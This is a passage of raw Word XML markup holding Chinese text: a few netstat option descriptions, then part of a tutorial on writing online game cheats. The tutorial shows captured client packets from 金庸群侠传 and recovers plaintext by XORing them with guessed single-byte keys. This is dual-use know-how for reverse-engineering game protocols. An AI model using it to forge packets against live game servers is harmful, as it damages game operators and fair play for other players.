          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，包括正在监听的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-c </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每隔</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒就重新显示一遍，直到用户中断它。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示所有网络接口的信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-n </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址代替名称，显示出网络连接情形。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示核心路由表，格式同</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"route -e"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-t </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议的连接情况。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-u </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议的连接情况。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">-v </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示正在进行的工作。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goodmorning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>集整理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请勿删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络游戏外挂编写基础②</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三：怎么来分析我们截获的封包？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">　　首先我们将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>截获的封包保存为文本文件，然后打开它，这时会看到如下的数据（这里我们以金庸群侠传里</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>店小二客户端发送的数据为例来讲解）：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第一个文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SEND-&gt; 0000 E6 56 0D 22 7E 6B E4 17 13 13 12 13 12 13 67 1BSEND-&gt; 0010 17 12 DD 34 12 12 12 12 17 12 0E 12 12 12 9BSEND-&gt; 0000 E6 56 1E F1 29 06 17 12 3B 0E 17 1ASEND-&gt; 0000 E6 56 1B C0 68 12 12 12 5ASEND-&gt; 0000 E6 56 02 C8 13 C9 7E 6B E4 17 10 35 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">27 13 12 12SEND-&gt; 0000 E6 56 17 C9 12 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第二个文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SEND-&gt; 0000 83 33 68 47 1B 0E 81 72 76 76 77 76 77 76 02 7ESEND-&gt; 0010 72 77 07 1C 77 77 77 77 72 77 72 77 77 77 6DSEND-&gt; 0000 83 33 7B 94 4C 63 72 77 5E 6B 72 F3SEND-&gt; 0000 83 33 7E A5 21 77 77 77 3FSEND-&gt; 0000 83 33 67 AD 76 CF 1B 0E 81 72 75 50 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">42 76 77 77SEND-&gt; 0000 83 33 72 AC 77 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　我们发现两次</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>店小二的数据格式一样，但是内容却不相同，我们是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，为什么会不同呢？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原来金庸群侠传的封包是经过了加密运算才在网路上传输的，那么我们面临的问题就是如何将密文解密成明文再分析了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　因为一般的数据包加密都是异或运算，所以这里先讲一下什么是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>异或。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单的说，异或就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相同为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不同为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（这是针对二进制按位来讲的），举个例子，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异或，我们按位对比，得到异或结果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，计算的方法是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它们相同，则异或结果的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相同为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不同为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的原则得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则异或结果的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则异或结果的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则异或结果的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，组合起来就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0011</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。异或运算今后会遇到很多，大家可以先熟悉熟悉，熟练了对分析很有帮助的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　下面我们继续看看上面的两个文件，按照常理，数据包的数据不会全部都有值的，游戏开发时会预留一些字节空间来便于日后的扩充，也就是说数据包里会存在一些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"00"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字节，观察上面的文件，我们会发现文件一里很多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"12"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，文件二里很多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"77"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，那么这是不是代表我们说的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"00"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>呢？推理到这里，我们就开始行动吧！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　我们把文件一与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"12"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异或，文件二与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"77"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异或，当然用手算很费事，我们使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">"M2M 1.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加密封包分析工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来计算就方便多了。得到下面的结果：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第一个文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1 SEND-&gt; 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09SEND-&gt; 0010 05 00 CF 26 00 00 00 00 05 00 1C 00 00 00 892 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SEND-&gt; 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 083 SEND-&gt; 0000 F4 44 09 D2 7A 00 00 00 484 SEND-&gt; 0000 F4 44 10 DA 01 DB 6C 79 F6 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5 02 27 35 01 00 005 SEND-&gt; 0000 F4 44 05 DB 00 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">　　第二个文件：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1 SEND-&gt; 0000 F4 44 1F 30 6C 79 F6 05 01 01 00 01 00 01 75 09SEND-&gt; 0010 05 00 70 6B 00 00 00 00 05 00 05 00 00 00 1A2 SEND-&gt; 0000 F4 44 0C E3 3B 13 05 00 29 1C 05 843 SEND-&gt; 0000 F4 44 09 D2 56 00 00 00 484 SEND-&gt; 0000 F4 44 10 DA 01 B8 6C 79 F6 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5 02 27 35 01 00 005 SEND-&gt; 0000 F4 44 05 DB 00 </w:t>
      </w:r>
    </w:p>
